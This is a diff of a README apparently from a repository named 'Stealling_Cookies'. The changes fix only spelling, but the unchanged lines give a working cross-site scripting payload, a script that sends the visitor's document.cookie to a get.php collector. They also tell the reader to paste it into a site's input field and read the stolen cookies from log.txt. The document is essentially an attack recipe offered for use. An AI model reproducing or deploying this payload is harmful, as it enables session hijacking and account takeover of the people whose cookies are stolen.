YasserREED/Stealling_Cookies/README.md

 <script> window.location='https://127.0.0.1/get.php?cookie='+document.cookie </script>

-2 - Paste into input filed.
+2 - Paste into the input filed.

-3 - Check log.txt. //if not showen you can refresh the page 🔄
+3 - Check log.txt. //if not shown you can refresh the page 🔄

 # Take the cookie Silence by get.php and send it to log.txt